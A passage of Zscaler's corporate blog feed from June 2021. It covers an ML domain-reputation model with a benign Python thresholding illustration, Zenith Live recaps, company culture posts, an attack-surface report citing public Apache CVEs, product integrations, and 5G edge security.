We’ve created an ML-based domain reputation model that pre-filters outbound domains, which in turn makes a downstream threat-detection module (e.g., a command and control model) more practical and effective. Users visit many domains a day. If a domain is known to be bad (because it was associated with a known threat, for example) then it will be blocked. But there will still be unknown domains, and even though they might represent a small percentage of the total, the scale is still huge: Zscaler traffic includes visits to many millions of such domains a day. In this case, ML aids threat detection (including but not limited to phishing and command and control detection) by identifying whether a given domain is suspicious or not. This pre-filtering model reduces the unknown domain list to a size that is manageable for further advanced analysis. In our setup, the ML-based domain reputation model returns a value between 0 and 100 that reflects the likelihood of a good domain. The lower the score, the more likely the domain is bad.

Figure 1. Zscaler patent-pending domain reputation AI/ML model.

As shown in Figure 1, the total domain reputation score is calculated from its sub-component scores. A machine learning method is used to automatically adjust the weights of these scores to make sure that the final reputation scores follow a Gaussian distribution (see Figure 2 below). This allows us to set a threshold to control the fraction of “suspicious” domains to be sent for further analysis. This patent-pending ML model enables us to keep the “suspicious” domain volume low enough to be practically and deeply analyzed without compromising threat posture. The outcome is that we can filter out clean transactions effectively and focus our analytical energy on only the suspicious ones.

Figure 2 below shows sample output based on recent real traffic plus test data sets including the recent SolarWinds supply-chain attack domains.

Figure 2. Frequency distribution of the domain reputation AI model scores (blue bars) and its fitted Gaussian model (orange curve). Domains to the left of the red line are considered “suspicious” and will be passed to the downstream command and control detection AI model.

As it turned out in the lab test in Figure 2 above, our model assessed twelve (12) SolarWinds-attack-related domains and correctly classified all of them as “suspicious”. From here, we then ran a command-and-control detection model (I will discuss it in a future blog) on all of the suspicious domains. We discovered real unknown threats, and here is one example that was added to the Zscaler threat database and blocked around the world:

Figure 3. One malicious domain found in a downstream Zscaler command-and-control detection AI/ML model.

ML-based domain reputation analysis enables Zscaler to detect and block unknown threats more efficiently and effectively

Finding the needle in the haystack is difficult enough as it is due to the scale and speed requirements.
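To make the threshold mechanism described above concrete, here is an added Python illustration (not Zscaler's model or code) of the pipeline the post sketches: sub-component scores are combined with weights into a 0 to 100 reputation score, a Gaussian is fitted to the resulting population, and the cut-off is placed at the quantile that yields a chosen fraction of "suspicious" domains for downstream analysis. The sub-component names, the weights, the domain names and every score are constructed for the example; the post does not disclose the real components or how their weights are learned.

```python
"""Gaussian-calibrated cut-off for a 0..100 domain reputation score.

Added illustration, not Zscaler's model. Lower score = more likely bad, as in
the post. The fitted Gaussian turns "send the most suspicious 10% downstream"
into a concrete score threshold, which is the knob the post describes.
"""
import random
from statistics import NormalDist

# Hypothetical sub-components and weights (constructed; the real ones are not public).
WEIGHTS = {"registration_age": 0.40, "traffic_volume": 0.35, "lexical": 0.25}


def combine(sub_scores: dict, weights: dict = WEIGHTS) -> float:
    """Weighted average of sub-component scores; inputs and output are in 0..100."""
    total = sum(weights.values())
    return sum(sub_scores[name] * w for name, w in weights.items()) / total


def fit_threshold(scores, suspicious_fraction: float):
    """Fit a Gaussian to the score population; return (mean, stdev, threshold).

    The threshold is the Gaussian quantile below which the requested fraction of
    domains is expected to fall, i.e. the red line in the post's Figure 2.
    """
    dist = NormalDist.from_samples(scores)
    return dist.mean, dist.stdev, dist.inv_cdf(suspicious_fraction)


def select_suspicious(domain_scores: dict, suspicious_fraction: float = 0.10):
    """Return (threshold, [(domain, score), ...]) for domains at or below the cut-off."""
    _, _, threshold = fit_threshold(list(domain_scores.values()), suspicious_fraction)
    flagged = sorted((d, s) for d, s in domain_scores.items() if s <= threshold)
    return threshold, flagged


def constructed_population(n: int = 500, seed: int = 7) -> dict:
    """Constructed sample: n unremarkable domains plus three with poor sub-scores everywhere."""
    rng = random.Random(seed)
    population = {}
    for i in range(n):
        subs = {name: min(100.0, max(0.0, rng.gauss(70, 12))) for name in WEIGHTS}
        population[f"domain{i}.example"] = combine(subs)
    # Constructed outliers: newly registered, barely visited, random-looking names.
    for name in ("a1b2c3d4.example", "x9q-upd.example", "zz9f1a.example"):
        population[name] = combine({"registration_age": 5.0, "traffic_volume": 8.0, "lexical": 12.0})
    return population


if __name__ == "__main__":
    population = constructed_population()
    threshold, flagged = select_suspicious(population, 0.10)
    print(f"threshold={threshold:.1f}  flagged={len(flagged)}/{len(population)}")
    for domain, score in flagged[:5]:
        print(f"  {domain:20s} {score:5.1f}")
```

One caveat the example makes visible: a plain mean/standard-deviation fit is pulled by the very outliers you want to catch, so the three planted domains widen the fitted Gaussian and the flagged share comes out below the nominal 10%. In practice the fraction should be monitored against the observed score histogram (as the post's Figure 2 does) or the fit made robust, for instance by estimating location and scale from the median and interquartile range.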
Finding the unknown threat in massive volumes of data traffic is like trying to find a single needle in a million haystacks...and you don’t know what a needle looks like. Every day, more and more unknown threats appear, introducing new risks to modern enterprises. The Zscaler Machine Learning and AI team’s advanced technology -- including the AI/ML-based URL categorization and AI/ML-based domain reputation scoring referenced in this blog -- mitigates the risk of unknown threats. And in the milliseconds it takes for those models to identify an unknown threat as an actual threat to be blocked, security improves for every single Zscaler customer. For more on Zscaler Machine Learning and AI technology blocking unknown threats in practice, watch my presentation from the recent Virtual Zscaler CXO Summit. Fri, 18 Jun 2021 08:00:01 -0700 Howie Xu Zenith Live EMEA is a Wrap! Another Zenith Live is in the books, and we’re proud to say this was our biggest event and arguably our best one yet. While we wish we could have gathered together in person, the sense of community, engagement, and enthusiasm displayed by attendees, customers, partners, and speakers brought this event together. Two days of real-life transformation stories, keynotes, panels, demos, and training leave us all with a lot to unpack and take with us as we move forward together on our transformation journeys. With that in mind, we wanted to share a quick summary of this year’s Zenith Live so you can catch up on anything you may have missed. (Many sessions are available on demand here.) Day one highlights Zscaler CEO Jay Chaudhry opened the conference by congratulating the entire IT community for its heroic work last year, keeping their organizations operating and employees working, while highlighting how the pandemic accelerated the need for a modern digital infrastructure based on zero trust. 
In Jay's words, "IT has proven time and again its resilience in not just adapting to change but being the catalyst for change." He explained how the Zscaler Zero Trust Exchange, our cloud-native platform that powers all Zscaler services, helped many customers through the transition to work from home and is now enabling new capabilities. The Zero Trust Exchange is helping customers accelerate transformation in three ways: by modernizing the workplace to enable work from anywhere, by eliminating the attack surface to reduce risk, and by transforming security so that it can be everywhere, blocking cyberattacks, preventing data loss, and eliminating lateral threat movement. You can watch Jay’s keynote and many of the other sessions on demand: Following his opening remarks, Jay was joined by Karl Hoods, Chief Digital Information Officer at the UK’s department for business, energy, and industrial strategy, for the CIO Perspective Panel. They discussed how CIOs are tasked with transforming all aspects of the business and are now empowered to lead a range of initiatives. Karl also explained some of the challenges his organization faced when tasked with quickly and securely providing efficient work-from-anywhere experiences. In another illuminating discussion, Gulay Stelzmullner of Allianz Technology, Petek Ergul of HSBC, and Alissa Choong of Shell joined Zscaler EVP Kavitha Mariappan for the Women in IT panel. In this fireside chat, they discussed what truly lies beyond C-level attainment, including creating and mentoring tech leaders, championing diversity and inclusion, and making an industry-wide impact. All four leaders shared personal stories of how they used their conviction to succeed in the transformative roles they hold today. Day two highlights Day two opened with the second installment of “Innovating at the Speed of Cloud," with Amit Sinha, Steve House, and Tony Paterra describing enhancements across the Zscaler platform. 
Some of them included inline and out-of-band CASB for better data protection and compliance. Security innovations include the first zero trust solution to include active defense, an exciting approach to cybercrime prevention, and we have expanded Cloud Browser Isolation capabilities in both the ZIA and ZPA services to isolate users and devices from potentially risky content. Customers provided powerful insights The morning continued with a CISO panel featuring Andrew Vautier of Accenture and Angelique Grado of Technip FMC, who joined Zscaler’s Yogi Chandiramani to address how today’s new hybrid work model may continue indefinitely, and what this means for security teams. In an enlightening discussion, the CISO panel cited the alignment of security and business objectives as a must—in other words, the role of the CISO needs to evolve to straddle both the technical and operational aspects of leveraging zero trust to support new business initiatives and deliver tangible success. The conversation around elevating IT as a key business enabler continued with the CTO panel. An underlying theme of this year's Zenith Live was embracing zero trust to improve business agility and resiliency to support the needs of today's hybrid workforces. According to our expert panel, including Zscaler's Nathan Howe, Mondi Group's Thomas Vavra, and Richemont International's Eduardo Grilo, the CTO's job is to create a fast, secure user experience for employees both returning to the office and working remotely. Our customer keynotes included four leaders whose companies have built resilience and agility within their businesses despite COVID-19 setbacks. Claude Pierre of Engie, Alain Delava, also of Engie, Sebastian Kemi of Sandvik, and Andrew Baker of Absa Group shared differing stories but their insights were similar, particularly when it came to the use of zero trust to successfully modernize their companies to enable modern workforce with a great user experience and enhanced security. 
We are grateful to all the customers who joined us and spoke at Zenith Live in keynote sessions, in panels, and in our technical breakout sessions. Thank you!
Dear partners, Zenith Live wouldn’t be Zenith Live without you
By joining with technology leaders whose services are complementary to the Zscaler Zero Trust Exchange, we can provide customers with integrated solutions that enable them to become more secure, resilient, and agile. With our partners, we have formed a strong ecosystem of future-forward thought leadership, strategy, and technology. Today’s partner summit celebrated exactly that—a group of technology evangelists and leaders joining forces to continue the digital transformation momentum over the next year and beyond.
That’s all folks, see you at Zenith Live 2022!
This concludes Zenith Live EMEA 2021, and what an event it was. Zscaler thanks you for making this our best Zenith Live yet! We hope you found our speaker sessions, training, panels, and workshops informative and relevant as you move full cloud ahead. If you missed Zenith Live, be sure to view its illuminating sessions on demand. We hope to see you next year!
Thu, 17 Jun 2021 12:43:27 -0700 Ismail Elmas
What our Latest Glassdoor Award Means to Zscaler
I just learned that Zscaler’s CEO, Jay Chaudhry, has been named one of the Top 100 CEOs by Glassdoor. The award is based on a rating system submitted by employees and, for that reason, above all, I am thrilled for Jay. But I’m not all that surprised. This company has grown a lot, especially in the last year, but the company’s culture and its values that were defined by Jay more than a dozen years ago continue to inform our practices every day. What I’ve found inspiring about these values is that they are dynamic, helping us grow during changing times while staying true to our corporate ethos. As can be said of most companies, these past 15 months have provided a case study in change.
There was the rapid switch to remote work, of course, but between March 2020 and now, we also doubled our staff size, welcoming more than 1,500 new employees to the company. And while things were moving fast on multiple levels—especially supporting our customers as they transitioned their employees to remote work—Zscaler leaders paid close attention to our employees—connecting, listening, and learning about how they were feeling. We developed a range of programs to support them, help them engage with others through resource groups, and take breaks for exercise, games, or meditation. And we instituted occasional company-wide days off. We have also developed a self-service management microsite with training and skills development in partnership with Coursera and other platforms. This program, Leading at Z, is well underway, helping managers at any stage of their careers enhance their skills and develop new ones. Another program is under development for all Zscaler employees, called Succeeding at Z, to support everyone in their professional growth, so they can achieve their own definition of success. We’ve learned a lot from employees and we’ve tried to introduce programs and practices that address their concerns about work-life balance, mental and physical health, and the importance of family time and time off, and the benefit of upward mobility. It’s gratifying to see the company’s efforts reflected in employees’ reviews of Jay as the company’s leader. I’m coming up on my first-year anniversary at Zscaler and, even in this timeframe, I can see a more mature company emerging. It has a lot to do with growth, but I believe it has even more to do with the leadership team, which has always been closely aligned on the vision of building a great and lasting company. Realizing this vision requires the hiring and retention of exceptional people across the company who are excited to be here and are passionate about what we are all trying to achieve on behalf of our customers. 
Though the company is changing, its founding values have never changed. I believe that is why Jay is being recognized now as a top CEO, and why Zscaler will, indeed, become a great and lasting company. Here are those values: Teamwork: We celebrate together. We openly share information. We move as one. We value serving others over personal prestige. We value humility over ego by showing respect and recognizing the truth in all situations. Humble leadership empowers our employees to speak their mind and innovate. Open communication (candor over politics): We have open discussions about what’s right and what’s wrong. Put another way, we don’t enable politics. We value real feedback and relationships built upon honesty and trust. Passion (over self-interest): We are fiercely passionate about our work, our company, our colleagues, our customers, and our partners. We put grit over image, that unique combination of passion, courage, and long-term perseverance over innate talent and intelligence. Innovation: We are driven to not only innovate cloud transformation through our products but to also innovate in our jobs, whether an engineer, marketer, salesperson, or lawyer. Customer obsession: We are, above all else, obsessed about our customers’ success. Everything we do is about helping our customers succeed in their business transformation to the cloud. Part of this, too, is valuing results over activity. Join us! Zscaler continues to seek people who share these values. Please visit our careers page to learn more. Thu, 17 Jun 2021 08:01:08 -0700 Sandi Lurie Celebrating Juneteenth — Listen, Learn, and Reflect on African American History Most people are familiar with the celebration and history behind Independence Day. While the United States became free with the signing of the Declaration of Independence in 1776, Black people had not been freed from slavery at that time. 
As a result, many in the Black community feel somewhat disconnected from the Fourth of July holiday—a great day for America, but not for Black Americans. In fact, Black people were not declared free for another 87 years. And even still, it took an additional two years beyond Abraham Lincoln’s signing of the Emancipation Proclamation for the last enslaved people to be freed in Galveston, Texas, on June 19, 1865. Juneteenth provides a day of remembrance and reflection for all Americans, and it’s extremely gratifying to see that Juneteenth is gaining the attention it deserves as a landmark day in American history—just this week, Juneteenth was established as a federal holiday with unanimous approval by the U.S. Senate. Let’s take a closer look at the day’s origins and how the Zscaler community can contribute positively to the conversation surrounding this annual day of recognition. The first Juneteenth: a brief history For those unfamiliar with Juneteenth, we would like to share a bit of history, beginning with the General Order that was issued on June 19. It isn't talked about nearly enough, but it is the reason behind today's reflections: “The people of Texas are informed that, in accordance with a proclamation from the Executive of the United States, all slaves are free. This involves an absolute equality of personal rights and rights of property between former masters and slaves, and the connection heretofore existing between them becomes that between employer and hired labor. The freedmen are advised to remain quietly at their present homes and work for wages. They are informed that they will not be allowed to collect at military posts and that they will not be supported in idleness either there or elsewhere.” —General Orders, Number 3; Headquarters District of Texas, Galveston, June 19, 1865. What does this all mean today? June 19, 1865, also known as Juneteenth, is the oldest nationally celebrated commemoration of the ending of slavery in the United States. 
Juneteenth is a celebration of the journey and freedom of Black people in this country. We embrace this moment to acknowledge the many contributions that Black people have made to American culture and honor those who died for our freedom. Juneteenth is the real "Freedom Day" for African Americans. But to have true freedom, we must continue to break through the systemic barriers that have plagued African American communities for centuries around the world. To me, Juneteenth is a day of empowerment. As the company-wide programming and committee chair of B@Z—Zscaler’s internal network of African American employees and allies—I believe that empowerment is about leveraging our platforms, exercising our voices in everyday moments, and being intentional about our actions for change. Zscaler’s Juneteenth Town Hall Celebration Zscaler is honoring Juneteenth by hosting a company-wide Town Hall celebration to educate, empower, and uplift employees. Our Diversity, Equity, and Inclusion resource group, B@Z, has curated a cultural visual experience along with an intimate conversation with Marvin Whitaker and Michelle Smith on the importance of Juneteenth and the impact systemic racism has had on the Black community. We also wanted to share some resources that we are excited about. These organizations not only support Black businesses, but also leverage technology to build momentum behind these initiatives: MyBlackReceipt, launched June 19, 2020, is the first “Buy Black” movement that quantifies collective purchases from Black-owned businesses. This movement encourages consumers to support Black-owned businesses and show their support by uploading receipts—starting Juneteenth, sales totals will be shown on a live counter. When you support a Black business owner, you support Black jobs, Black causes, and Black wealth building. So, find Black businesses and upload your receipts! 
WeBuyBlack is an online marketplace where customers may purchase everything they need from Black-owned businesses, helping to build social and economic justice globally. Sellers may register to sell their products to a diverse, open, and international market. The site was launched for public purchases on June 19, 2015, which marked the 150th anniversary of Juneteenth. I’m proud to be a part of B@Z and the Zscaler community as a whole. The services that Zscaler delivers are consequential, and it’s exciting to work alongside people who are empowered to do their best work and are passionate about bringing positive change to enterprise customers. As we all reflect on Juneteenth, let’s celebrate empowerment in all its forms—in our professional lives, in our personal quests, and in the memories and the progress the day represents. And let’s all commit to paying it forward, as there is still much work to be done.
Additional resources about Juneteenth: The Root; PBS.
Wed, 16 Jun 2021 17:56:28 -0700 Tyrin Ford
Zscaler Customers Are Moving Full Cloud Ahead
What an incredible conclusion to day one of our fourth annual Zenith Live virtual conference! It was an honor to share the stage with my colleagues, guest luminaries, and our marquee multinational customers, BP and DHL. We reached a new record with more than 15,000 registrants committing two days to learn how organizations globally are adopting zero trust to rapidly secure work-from-anywhere, prevent cyberthreats and data loss, and improve the digital experience for users everywhere.
Zero trust is accelerating transformation
The cloud and mobility have been agents of change, empowering organizations to harness the speed and agility they need to remain competitive. The pandemic didn’t change this trajectory, but it did accelerate it. As organizations scaled remote access for most of their employees, those that had the greatest success had already begun their zero trust journeys.
It was inspiring to hear customers describe how zero trust helped them through the crisis, and is now empowering their businesses to speed the development of new products and services, become more productive and collaborative, and protect their data, all in a way that simplifies IT. That, to me, is the definition of a modern organization. In my keynote, I described how the Zscaler Zero Trust Exchange, our cloud-native platform that powers all Zscaler services, is helping customers accelerate transformation in three critical ways. The first is by enabling workplace modernization, which means that employees can work from anywhere, securely, with a fast, streamlined user experience. The Zero Trust Exchange also enables network transformation with fast, secure, direct-to-cloud connections that simplify branch connectivity and eliminate costly wide area networks. And it powers security transformation to prevent cyberthreats, prevent data loss, and eliminate the risk of lateral threat movement. Customers provided the most inspiring moments at Zenith Live When customers get up and talk about their experiences, we know that’s when audience members pay especially close attention. Our customers can speak to the types of challenges each attendee is likely to face at one point or another. I am so grateful for all the customers who are participating this year in Zenith Live keynotes, CXO panels, our Women in IT exchange, and the many who joined in our technical breakouts to discuss their Zscaler implementations and experiences with our services. For BP, IT is building a more agile company This morning I spoke with Rasik Vekaria of BP, a company with 70,000 employees and operations in 120 countries. He described BP’s journey to zero trust. “For me, a zero trust architecture was critical to what we do from a security standpoint. 
This means, I don't care if you're on the network, in the network, around the network, over the network—we treat everything as if it’s compromised.” That approach, that mindset, is the crux of zero trust. If you assume that everything is compromised, you won’t let anything on your network. You inspect all traffic, coming and going, even if it’s encrypted, to prevent attacks and data loss. And you make your applications invisible to the internet to eliminate the attack surface.
DHL is making every connection fast, simple, and secure
Later in the morning, Zscaler’s VP of Emerging Technology, Nathan Howe, spoke with DHL’s VP and Head of Telecoms, David Branik. DHL has operations in almost every country, with third-party partners around the world, remote employees using a range of devices, and customers accessing their data in real time, which creates an incredibly complex task for the IT team. David spoke of the need to make access fast and simple for every type of user: “It's almost like...when you go and plug in something into the wall circuit, you expect that the electricity is there. You don't want to think about what's behind it. And I think, from a network perspective, it's virtually the same thing.” At Zscaler, we agree that the experience for any type of user should be frictionless, and it should be the same no matter where the user is connecting. User experience must be a business imperative.
See you tomorrow for more announcements, demos, and customer stories
Tomorrow, I look forward to hearing from Bruce Lee of Centene, a company that has grown tenfold—from 8,000 employees to 80,000—in ten years. With much of that growth through mergers and acquisitions, I know that Bruce will touch on the complexity the company faced, and how zero trust is enabling them to accelerate M&As from years to months to weeks. In case you missed any of today’s sessions, we will make recordings available soon.
And Zenith Live 2021 (Americas) continues tomorrow at 8:30 AM PDT, while day one of Zenith Live in the European (EMEA) region kicks off at 8:30 BST. There is much more in store for Zenith Live day two. In addition to Wednesday’s keynotes, customer panels, executive panels, and guest speakers, the virtual conference continues with architecture workshops, technical deep dives, and countless other opportunities to roll up your sleeves and go full cloud ahead. I hope to see you there.
Tue, 15 Jun 2021 20:13:46 -0700 Jay Chaudhry
2021 “Exposed” Report – An Exposé on the True Corporate Network Attack Surface
Exposure (noun) ex·po·sure | \ ik-ˈspō-zhər
a: the condition of being made known
b: the condition of being unprotected
c: the condition of being subject to some effect
d: the condition of being at risk of financial loss
e: all of the above
The word “exposure” has come up a lot over the last year, especially with regard to our physical health, but also the health of our corporate networks. In fact, these two realms of exposure are more closely related than we may have previously thought. As COVID-19 has forced many organizations to declare work-from-home (WFH) orders to limit employees’ exposure, remote work has increased the exposure of corporate networks because of the heavy reliance on the internet as the connective fabric for the business. Cybercriminals have been quick to take advantage of this exposure and are exploiting the fact that remote access has created opportunities to target remote workers, their devices, and the tools they use to access the internet, applications, and critical business systems while away from the office. This increase in VPN, RDP, and network-focused attacks puts businesses at risk, as direct access to the corporate network enables cybercriminals to move laterally throughout an organization’s infrastructure.
The conversation about exposure and attack surface is one that IT and security teams must face head-on to address the expanding attack surface and seek to minimize exposure. But how exposed are corporate networks? The 2021 “Exposed” report answers this question for the first time as it analyzes the visible attack surface of more than 1,500 organizations over the last year, uncovering attack surface trends affecting businesses of all sizes across all geographies and industries. While you can access the full report here, we wanted to highlight three interesting discoveries we found:
1. Most attack surface is the result of server and port exposure
The highest level of exposure we found came from servers, with 392,298 servers that were discoverable on the internet and possibly vulnerable. Our findings indicate that a total of 68 unique ports were discoverable and were exposed 214,230 times across all exposed servers. The most exposed ports were:
2. CVE vulnerabilities present huge potential risk
We uncovered 202,316 potential CVE vulnerabilities and identified 750 unique exploits across the attack surfaces of these 1,500+ businesses. These numbers result in an average of 135 potential CVE vulnerabilities per company, with 49 percent of them considered “Critical” or “High” in severity. The three most common CVE vulnerabilities are:
CVE-2018-1312 – CRITICAL – 6.8 CVSS Score
In Apache httpd 2.2.0 to 2.4.29, when generating an HTTP Digest authentication challenge, the nonce sent to prevent replay attacks was not correctly generated using a pseudo-random seed. In a cluster of servers using a common digest authentication configuration, HTTP requests could be replayed across servers by an attacker without detection.
CVE-2017-7679 – CRITICAL – 7.5 CVSS Score
In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious content-type response header.
CVE-2019-0220 – MEDIUM – 5.0 CVSS Score
A vulnerability was found in the Apache HTTP Server 2.4.0 to 2.4.38. When the path component of a request URL contains multiple consecutive slashes ('/'), directives such as LocationMatch and RewriteRule must account for duplicates in regular expressions, while other aspects of the server’s processing will implicitly collapse them.
Are you exposed? > Find out now with our free attack surface analysis.
3. Public cloud contributes to exposure, too
The massive shift to work from home has led to a lot of companies relying on cloud services and platforms in order to quickly scale with minimal downtime. Based on our analysis, we discovered 60,572 exposed instances, which averages out to about forty exposures per company monitored. Here’s the breakdown of exposure across some of the top cloud platforms:
Minimizing your attack surface is an imperative
While the “Exposed” report provides the world’s first view of how exposed corporate networks really are, it’s up to IT and security teams to take steps toward minimizing their attack surface. This is just a small glimpse into our findings. See how your company’s attack surface compares to industry peers and get the full report here:
> Download report
> Measure your attack surface
Tue, 15 Jun 2021 08:00:01 -0700 Camilla Ahlquist
Introducing Zscaler and ServiceNow: Protect More, Work Smarter
As a cloud platform, ServiceNow delivers digital workflows that create great experiences and unlock productivity. But it also consumes and distributes massive amounts of sensitive data, which in today’s world is typically accessed by users working from outside the corporate network and away from traditional security controls stuck in the data center. By extending a zero trust approach to cloud applications, such as those delivered on the Now Platform®, organizations can ensure that they remain secure from data loss and compliance violations while enabling faster responses to emerging security incidents.
In light of this, we’re excited to announce our new ServiceNow integrations, which not only improve the platform's security posture against data loss and emerging threats, but also improve data visibility, data control, and security operations workflows within all areas of the Now Platform. With Zscaler Data Protection integrations, ServiceNow customers can rest assured that their most sensitive data remains secure from data exfiltration and compliance violations. Let’s take a closer look at these integrations and some of the challenges they help ServiceNow customers solve.
Solving data threat challenges within the Now Platform: visibility into sensitive data and restoring compliance
As with any cloud application, visibility into sensitive data is a must when forming a comprehensive data protection strategy—especially when considering the need to uncover, remediate, and ultimately avoid compliance violations. By leveraging Zscaler CASB and DLP, ServiceNow customers can improve data protection across their ServiceNow instances. Zscaler scans the entire Now Platform customer deployment instance for sensitive data to identify risky exposure and compliance issues. In doing this, security teams can quickly understand where sensitive data lives, how it’s being used, and who is accessing it.
Figure 1: Restore data protection and compliance
Enabling work-from-anywhere and controlling unmanaged devices
With so many unmanaged and BYOD devices accessing the Now Platform, today’s businesses need more control over how this data is being accessed. Through the Zscaler Zero Trust Exchange, organizations can remove the risks associated with BYOD and unmanaged devices accessing ServiceNow data. Zscaler Identity Proxy makes it easy for ServiceNow customers to authenticate unmanaged devices residing outside the corporate network by automatically restricting access from devices deemed too risky to access the platform.
By redirecting to Zscaler, risky BYOD and unmanaged devices are prevented from accessing ServiceNow directly. Devices can only connect to ServiceNow through Zscaler, which enforces security policies and access controls.
Figure 2: Securely enable work-from-anywhere
By preventing risky unmanaged and BYOD devices from accessing ServiceNow instances and sensitive data, ServiceNow customers can enable a more secure work-from-anywhere experience across secure managed devices only. Paired with Zscaler Cloud Browser Isolation, which streams content to unmanaged devices as screen pixels, data can be viewed while downloading, copying/pasting, and printing of it are prevented.
Responding to data threats with closed-loop workflows
When logged security incidents lack context, it is extremely difficult to quickly triage and remediate threats in real time. Together, ServiceNow Security Incident Response and Zscaler Threat Intelligence can automatically orchestrate response actions. By leveraging Zscaler threat intelligence and Cloud Sandbox within ServiceNow Security Operations (SecOps), you can accelerate security incident workflows. Risky IPs, domains, and URLs can be blocked without manual intervention, while cloud misconfigurations can be corrected to help reduce the risk of a breach. Response time is reduced, and IT teams increase productivity. In addition, cloud misconfigurations can be logged in ServiceNow IT Service Management (ITSM) for further investigation and remediation.
Figure 3: Improve security workflows
Figure 4: Quickly remediate cloud misconfigurations
Explore more
Learn more about Zscaler’s latest ServiceNow integrations with the resources below:
Zscaler and ServiceNow Solution Brief
Deployment Guide
About Zscaler Data Protection
Zscaler Data Protection follows your users and the applications they are accessing, always protecting you against data loss.
Zscaler inspects your traffic inline, encrypted or not, and ensures your SaaS and public cloud applications are secure, giving you the protection and visibility you need. The Zscaler Cloud Security Platform was built with compliance in mind, offering you an essential tool for complying with all major regulations and making data protection painless.
Thu, 10 Jun 2021 05:00:01 -0700 Steve Grossenbacher
A Powerful Combination: Active Defense, the Bridge to Zero Trust
The end of May marked a monumental juncture for Zscaler as we continued to extend the company’s cybersecurity reach with our intent to acquire Smokescreen Technologies, a leader in active defense technology. This week, I am excited to report that the Smokescreen deal has closed, and we are proceeding to integrate its leading-edge active defense capabilities into the Zscaler Zero Trust Exchange. In contrast to traditional network traffic analysis tools, which are noisy and prone to false positives, active defense uses elaborate decoys and honeytraps to block the most sophisticated threats with high accuracy as attackers attempt to traverse corporate networks. The appeal of active defense is how it turns the tables on would-be attackers. Security teams don’t have to hunt for network threats; rather, the bad actors are lured to honeytraps, dramatically slowing their progression so that security teams can quarantine the threats. While the ultimate answer is to migrate to a zero trust architecture, thus eliminating the risk of network access, active defense is founded on the similar concept of trusting nothing and assumes that the network is already breached. This offers organizations a pragmatic path to zero trust and provides a simple yet effective way for them to identify and remove attackers who may already be expanding laterally and compromising resources on the corporate network. I invite you to learn more about Smokescreen’s active defense technology at Zenith Live 2021.
The Zscaler ThreatLabZ experts will also share in-depth research into emerging attacks, dissect recent attack chains, and provide clear guidance on how to better secure your enterprise from sophisticated threats targeting your software supply chain. You’ll also get an exclusive preview into Zscaler’s protection suite, which unifies our threat intelligence, cybersecurity experts, and innovative technology to help defend your organization against the most advanced attackers. Forward-Looking Statements Blog posts on this site may contain forward-looking statements that are based on beliefs, assumptions and on information currently available to our management. These statements, including but not limited to statements relating to our products, customers, business development activities and business results, are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. You can identify these forward-looking statements by terminology such as “will,” “expects,” “believes,” “anticipates,” “intends,” “estimates” and similar statements. A significant number of factors could cause actual results to differ materially from statements made in blog posts on this site. Additional risks and uncertainties are set forth in our filings made with the Securities and Exchange Commission (“SEC”), which are available on our website at and on the SEC's website at Any forward-looking statements in these blogs are based on the limited information currently available to Zscaler as of the date thereof, which is subject to change, and Zscaler will not necessarily update the information, even if new information becomes available in the future. Mon, 07 Jun 2021 12:44:09 -0700 Jay Chaudhry 5G and the Power of the Edge The buzzwords of 5G and edge computing have forced their way into the spotlight of digital transformation, bringing with them huge potential to spark the next major wave of change. 
While 5G has the power to boost connectivity speeds – transmitting data 10 times faster than conventional connections – edge computing strives to get closer to the end user or end device to reduce latency, forming a powerhouse pairing that could ultimately replace traditional network structures completely. This shift paves the way for a revolution in production processes – a revolution that received extra push during the pandemic. Constrained by social distancing rules, production companies began to look for automation and remote-control solutions to keep lines flowing. Operational technologies (OTs) also benefit from these trends, which enable employees to monitor and control their machines remotely. However, OTs are still weighed down by their reputation for being slow and unwieldy in the face of change. In the manufacturing industry, fundamental transformation is usually planned well in advance, because security plays a business-critical role in the safe and uninterrupted operation of the machinery fleet. But the technology for change is already in the starting blocks, and it can be ready to go as soon as 5G masts are rolled out and widespread coverage is available. How does 5G work with (mobile) edge computing? The cornerstones of modern connectivity are speed, real-time data transmission, and mobile network density. The 5G data transmission standard will not only significantly speed up our cellular networks, it will also allow us to transmit data at a much faster rate. In ideal conditions, 5G will be capable of transmitting data 20 times faster than standard connections – delivering the speeds that are so essential to augmented reality and virtual reality applications, to name just a few examples. In these applications, the response time between the device and image processing should be no more than 12 to 15 milliseconds; slower processing could cause the user to experience VR motion sickness. 5G technology is not just about speed, either. 
Availability and reliability are also critical components of the Industry 4.0 applications of the future. Looking to the present day, ultra-reliable low-latency communication (URLLC) and edge clouds are already essential to real-time applications and seamless communication with machines beyond traditional networks. Aside from the many other factors that come into play in 5G network design, physical proximity to the device is critical to achieving low latency. This means that the core network infrastructure, security infrastructure, and application server need to be relocated from centralised data centres to the edge of the network and closer to the user. Computing on the edge is now a key prerequisite for many applications. Another major difference between 5G and 4G is the density of user transactions. While today’s 4G technology allows 4,000 users within a one-kilometre radius to be simultaneously connected, 5G can handle up to a million simultaneous connections. It is precisely this transaction density that opens the door to a whole new way of thinking – turning the traditional network infrastructure on its head in ways that would never previously have been possible. 5G provides connectivity infrastructure for all devices, with no need for a conventional network connection. By extension, this also means that security can no longer be delivered via the network infrastructure.
Security at the edge comes from the cloud
The Zscaler security cloud is already equipped with the functions required to keep up with the pace of change. Zscaler’s Zero Trust Exchange provides security at the edge and filters all user and machine traffic in the cloud. It does so using a cloud-native infrastructure – which also enables it to be deployed in a range of different locations, as close as possible to the end user or the machine. However, cloud technology has already reached a point at which far-reaching expansion to the edge is required.
And this is precisely where 5G technology comes into play; it will enable companies to harness the full power of edge computing. The crux of this power lies in mobile edge computing (MEC). At the ultimate edge, data traffic generated when browsing a website, for example, is no longer routed via the telecommunications network to the internet and back again, but handled directly at the cellular antenna in the immediate vicinity of the mobile device. This facet – the exact location of data processing in mobile edge computing – is not yet a widely recognised advantage of 5G. However, at some point or another, things are bound to start moving in this direction. When 5G and MEC eventually render traditional networks obsolete, cloud-based security will become an enabler of security for Industry 4.0 and end customers alike. To learn more about Zscaler emerging technologies, register for Zenith Live today! Mon, 07 Jun 2021 08:00:01 -0700 Nathan Howe Never Waste a Good (InfoSec) Crisis This post originally appeared on LinkedIn. While the best-managed crises are undoubtedly the avoided ones, there are some that plunge businesses and countries into turmoil en masse. The current global pandemic reminds me of the expression that you should “never waste a good crisis.” Indeed, the current crisis is driving change. Early in the pandemic, Fortune surveyed Fortune 500 CEOs, and three-quarters said COVID-19 would accelerate their company’s technological transformation. If such dramatic 